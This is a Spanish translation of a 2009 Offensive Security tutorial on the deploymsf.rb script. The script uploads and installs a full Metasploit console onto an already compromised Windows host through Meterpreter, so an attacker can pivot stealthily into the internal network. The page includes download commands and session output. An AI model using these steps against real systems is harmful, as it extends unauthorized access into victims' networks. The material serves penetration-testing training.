Metasploit como un Payload
De www.metasploit-es.com.ar
Metasploit como un Payload
Mubix desde http://room362.com ha lanzado un script en Ruby, que sirve para entregar una copia de Metasploit a un sistema “ya comprometido”, esto le permite esencialmente instalar/ejecutar/controlar Metasploit en la maquina de las víctimas y continuar así la explotación en ella. Esto sería muy beneficioso en muchos casos, lo mas importante sería que se está ya está haciendo un test de penetración y ha obtenido acceso al Meterpreter. Desde allí se puede bajar/subir/instalar Metasploit como un Payload y continuar asi con la explotación de la red interna.
¿Por qué es tan importante esto?
Primeramente por el sigilo, cuantas mas conexiones tengas saliendo de tu perímetro, más posibilidades tendrás de ser atrapado. Vale, pues este Payload le permite tener las conexiones desde origen e ir en primer lugar a la máquina comprometida. Esto también ayuda si pierde una conexión, tan solo tiene que tener un equipo para devolver la llamada, le mostramos como hacerlo mas adelante en el curso.
Bueno, primero lo primero, tienes que descargarte el script y colocarlo en la carpeta “plugins”. Descarga “deploymsf.rb” desde aquí: http://www.offensive-security.com/msf/deploymsf.rb
A continuación, tendrás que descargarte también la versión de Cygwin del Metasploit Framework. Tienes dos opciones, Metasploit Framework entero o simplemente msfconsole. Los pros y los contras son en gran tamaño los Payloads. 13mb si lo haces con versión completa y solo 5mb con msfconsole. Metasploit Cygwin (FULL): https://metasploit.com/framework-3.3-dev.exe msfconsole: https://metasploit.com/mini-3.3-dev.exe
Si utilizas la ruta por defecto del el script, querrás mover el “framework-3.3-dev.exe” a /tmp/ en Linux o especificar la opción “-d” con el directorio completo de dónde has puesto el instalador Cygwin. Además, recuerda que el nombre del ejecutable es “framework-3.3-dev.exe” Si estas utilizando el “mini-3.3-dev.exe” asegúrese de usar la opción “-f” y especifique el nombre del archivo.
root@bt4:/pentest/exploits/framework3/plugins# wget http://www.room362.com/tools/deploymsf.rb --2009-06-27 12:10:05-- http://www.room362.com/tools/deploymsf.rb Resolving www.room362.com... 66.197.106.2 Connecting to www.room362.com|66.197.106.2|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4227 (4.1K) [text/plain] Saving to: `deploymsf.rb' 100%[======================================>] 4,227 --.-K/s in 0.004s 2009-06-27 12:10:05 (1.07 MB/s) - `deploymsf.rb' saved [4227/4227]
Bueno, ya tenemos todo listo con el mini-3.3-dev.exe a la espera. Cuando tengamos la la consola Meterpreter, tendremos también un montón de comandos que ejecutar, así que vamos a ello.
meterpreter > run deploymsf -f mini-3.3-dev.exe -d /tmp/ [*] Running Meterpreter MSFp Deployment Script….. [*] Uploading MSFp for for deployment…. [*] MSFp uploaded as C:DOCUME~1bt4LOCALS~1Temp19211.exe [*] Installing MSFp……….. [*] Done! [*] Installation Complete! [*] Running cygwin shell channelized… [*] Channel 19 created – Type: interact 19 to play [*] Be warned, it takes a bit for post setup to happen [*] and you will not see a prompt, try pwd to check meterpreter > interact 19 Interacting with channel 19… [*] Configuring multi-user permissions for first run… [*] Configuring the initial user environment… pwd /home/bt4 ls msfconsole *** Metasploit only has EXPERIMENTAL support for Ruby 1.9.1 and newer, things may break! *** Please report bugs to msfdev[at]metasploit.com [-] *** [-] * WARNING: No database support: LoadError no such file to load — active_record [-] *** | | _) | __ `__ _ __| _` | __| __ | _ | __| | | | __/ | ( |__ | | | ( | | | _| _| _|___|__|__,_|____/ .__/ _|___/ _|__| _| =[ metasploit v3.3-rc1 [core:3.3 api:1.0] + — –=[ 379 exploits – 231 payloads + — –=[ 20 encoders – 7 nops =[ 156 aux msf >
Bueno ahora tenemos un Metasploit Framework totalmente instalado y listo para usarlo en la maquina de nuestra victima y además puede penetrarse en la red. Magnifico!
© Offensive Security 2009
Original by www.offensive-security.com Traslated by FreeInfo
